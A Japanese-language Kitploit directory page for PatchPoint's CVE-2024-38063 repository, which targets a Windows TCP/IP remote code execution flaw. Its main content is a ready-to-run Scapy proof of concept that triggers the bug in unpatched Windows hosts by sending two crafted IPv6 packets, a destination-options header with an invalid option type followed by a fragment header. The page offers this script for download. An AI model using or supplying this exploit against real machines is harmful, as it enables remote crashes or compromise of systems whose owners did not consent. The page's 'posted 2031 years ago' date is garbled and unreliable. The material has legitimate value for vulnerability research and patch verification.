Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-38063 | Kitploit
ツール/GitHubGitHub/patchpoint/cve-2024-38063
脆弱性分析エクスプロイトネットワークセキュリティペネトレーションテストペイロード開発バイナリエクスプロイト
GitHubpatchpoint/cve-2024-38063

CVE-2024-38063

リポジトリを見る
2031年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-38063

概要

2024年8月、MicrosoftはWindows TCP/IPのリモートコード実行(RCE)脆弱性に対するパッチをリリースしました。一部の研究者はすでにこの脆弱性のProof of Concept(PoC)を公開していますが、ほぼ同時期にPatchPointの研究者もこの問題の分析と再現を完了しました。 Twitterを含むさまざまなプラットフォームで誤情報が広まったため、この脆弱性を発動させるために必要な重要なポイントが誤解されているようです。そうした不正確な情報に反して、当社はこの脆弱性がわずか2パケットの送信のみで発動できることを示すPoCを公開することにしました。実際には、この脆弱性を発動させるために大量のパケットは必要ありません。

PoC

root@kitploit:~
from scapy.all import *
IPAddr  = '' # fe80::XXXX:XXXX:XXXX:XXXX
MACAddr = '' # XX:XX:XX:XX:XX:XX
ExtHdrDestOpt  = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()
sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False)

PCAP

pcap

デモ

CVE-2024-38063_Demo.mp4

※ この脆弱性を発動させるには、約60秒の待機時間が必要です

参照

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063
ツールをダウンロード